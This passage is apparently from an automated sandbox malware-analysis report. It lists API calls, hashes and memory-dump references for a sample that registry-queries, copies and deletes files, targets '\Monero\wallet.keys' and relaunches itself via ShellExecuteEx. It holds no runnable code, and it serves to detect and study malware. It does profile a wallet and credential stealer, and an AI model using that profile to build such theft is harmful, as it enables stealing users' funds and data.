                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 6bd8ddda9dc92c9fa480d1e420651041e7cf84ba90a02d389a11e6462f911513
                              • Instruction ID: 5a6c42d276ee0c977f67cc560e5d9b02638edb57673b65d98846330ae3f502e9
                              • Opcode Fuzzy Hash: 6bd8ddda9dc92c9fa480d1e420651041e7cf84ba90a02d389a11e6462f911513
                              • Instruction Fuzzy Hash: 8A618271A00258EFDB28EFA4DC96FED7775AF54300F408018F90A9F191EB746A05CB92
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,00FFD6A0,00000000,00020119,?), ref: 001340F4
                              • RegQueryValueExA.ADVAPI32(?,00FFE0E0,00000000,00000000,00000000,000000FF), ref: 00134118
                              • RegCloseKey.ADVAPI32(?), ref: 00134122
                              • lstrcat.KERNEL32(?,00000000), ref: 00134147
                              • lstrcat.KERNEL32(?,00FFE0F8), ref: 0013415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: b8bbf99eab979d9172ff5bad2068fc39c463c9a404eb373e6d806fbbcb1d55f4
                              • Instruction ID: a42351f87a61d13a71280eb247f90dad9b58a9400c88c8c390f6a12d059aa8fd
                              • Opcode Fuzzy Hash: b8bbf99eab979d9172ff5bad2068fc39c463c9a404eb373e6d806fbbcb1d55f4
                              • Instruction Fuzzy Hash: 3241A7B6D001086BDB15EBA0EC46FFE737DAB99300F008558F61557181EBB59B888FE2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00137E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,00FEC518,00000000,00020119,?), ref: 00137E5E
                              • RegQueryValueExA.ADVAPI32(?,00FFD680,00000000,00000000,000000FF,000000FF), ref: 00137E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00137E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 06b96a86d5a162e464c726aafdf83aa3e7a5252136e4697dcc3443651ea50627
                              • Instruction ID: 300154db61fed61d19e809db2e72df4dc850fdf6d2aa0bd9902ab75fce717684
                              • Opcode Fuzzy Hash: 06b96a86d5a162e464c726aafdf83aa3e7a5252136e4697dcc3443651ea50627
                              • Instruction Fuzzy Hash: B7114CB1A44605EBDB15CF95DD49FBBBBBCEB48B10F108169F605A7280D7B468008FA2
                              APIs
                              • StrStrA.SHLWAPI(00FFDFF0,?,?,?,0013140C,?,00FFDFF0,00000000), ref: 0013926C
                              • lstrcpyn.KERNEL32(0036AB88,00FFDFF0,00FFDFF0,?,0013140C,?,00FFDFF0), ref: 00139290
                              • lstrlen.KERNEL32(?,?,0013140C,?,00FFDFF0), ref: 001392A7
                              • wsprintfA.USER32 ref: 001392C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 35c6f6106a1c9d0e4e9bec9876a6f96868925956e05c43a0bac584e2647c16b5
                              • Instruction ID: 86a98f583625c5b618b268ab2b6e73cdf4a448aadbb7c0f9171fee93ab068ee4
                              • Opcode Fuzzy Hash: 35c6f6106a1c9d0e4e9bec9876a6f96868925956e05c43a0bac584e2647c16b5
                              • Instruction Fuzzy Hash: D001C475500608FFCB05DFECC998EAE7BB9EB48354F148148F909AB244C771AA40DF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001212B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001212BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001212D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001212F5
                              • RegCloseKey.ADVAPI32(?), ref: 001212FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: ac2cdbd08c9c0633e1efab92d05b3640b5bdb05ab2118662d36a09c3678a89dd
                              • Instruction ID: a36c424e3eaaf22243e1c6843911a777a873b48900df1fd2852d0edd5e1e6329
                              • Opcode Fuzzy Hash: ac2cdbd08c9c0633e1efab92d05b3640b5bdb05ab2118662d36a09c3678a89dd
                              • Instruction Fuzzy Hash: E701E6B5A40208BBDB15DFD4DC49FAEB7BCEB48701F108155FA05A7280D6B5AA018F51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: d6d7bb6d56693708e42d4bf11d9801081fd8b27b608a6f161f98b898efcacb76
                              • Instruction ID: 1a89e42932381ef6f5543482f414a6b21d25215af54edc368dc504b01a82f521
                              • Opcode Fuzzy Hash: d6d7bb6d56693708e42d4bf11d9801081fd8b27b608a6f161f98b898efcacb76
                              • Instruction Fuzzy Hash: 474107B110079C5EDB258B24CC85FFBBBE89F45708F1444E8E9CA96182D3719B44CFA0
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00136663
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00136726
                              • ExitProcess.KERNEL32 ref: 00136755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 91d028ea6d15a0a9f71f547e20646773c34c5c56ac5f4215dbc249b30e0b85cb
                              • Instruction ID: fdfffda215cb85891a40217923aca1273a8847429ba9a7ce239df8179f56018a
                              • Opcode Fuzzy Hash: 91d028ea6d15a0a9f71f547e20646773c34c5c56ac5f4215dbc249b30e0b85cb
                              • Instruction Fuzzy Hash: 2D31F9B1801218ABDB15EB90DC96BDEB77CAF54300F804199F30A76191DFB46B49CF6A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00140E28,00000000,?), ref: 0013882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00138836
                              • wsprintfA.USER32 ref: 00138850
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 81d3220d428f9d4711ee7d5b1c7c95793b67b4158b8a8c541b065ba9423faf7d
                              • Instruction ID: 16dc0a5fb5836bf62fb1bf70913f29efc7071231e27ea8c971d1295f403fb9bf
                              • Opcode Fuzzy Hash: 81d3220d428f9d4711ee7d5b1c7c95793b67b4158b8a8c541b065ba9423faf7d
                              • Instruction Fuzzy Hash: 7A2130B1A40604AFDB05DFD4DD49FAEBBB8FB48701F108119F605B7280C7B9A9008FA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0013951E,00000000), ref: 00138D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00138D62
                              • wsprintfW.USER32 ref: 00138D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 21f9ab62abf70cfea518c61373aa373181177b680eb8d43e5419c95b742db0eb
                              • Instruction ID: cc947b8b3be8f35db3bd43e1160cd6abd50b9e3d3e16206ebe1332f760c89b35
                              • Opcode Fuzzy Hash: 21f9ab62abf70cfea518c61373aa373181177b680eb8d43e5419c95b742db0eb
                              • Instruction Fuzzy Hash: DBE08670A40208BFC700DBD4DD09E597BBCEB45702F004054FD0A97240DAB16E008F52
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00FFA990,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0012A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0012A6BC
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0012A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 268392614299d31eb2e6e3c326f09e400d7a2e9cd515302e39ac27849f4a9036
                              • Instruction ID: cb65f96fbfefb24f283b584e36ce234e07edb5bf48c144e250cdae337f7f415b
                              • Opcode Fuzzy Hash: 268392614299d31eb2e6e3c326f09e400d7a2e9cd515302e39ac27849f4a9036
                              • Instruction Fuzzy Hash: 2FE1D072810118ABDB05FBA4DCA2EEE733CAF24301F908159F557B6091EF746A4DCB66
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00FFA990,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012D481
                              • lstrlen.KERNEL32(00000000), ref: 0012D698
                              • lstrlen.KERNEL32(00000000), ref: 0012D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0012D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: fc17b68090d64dd29390136b2c389b9d493252ae4615b2ba67f3d320d8be6402
                              • Instruction ID: 8546b287c802621bc0cf6714b21197deadef3bb3b33ce0a4ca3b3e6efbb54fbf
                              • Opcode Fuzzy Hash: fc17b68090d64dd29390136b2c389b9d493252ae4615b2ba67f3d320d8be6402
                              • Instruction Fuzzy Hash: 1E911772910108ABDB05FBA4DC96EEE733CAF24305F908158F547B7091EF746A49CB62
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00FFA990,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012D801
                              • lstrlen.KERNEL32(00000000), ref: 0012D99F
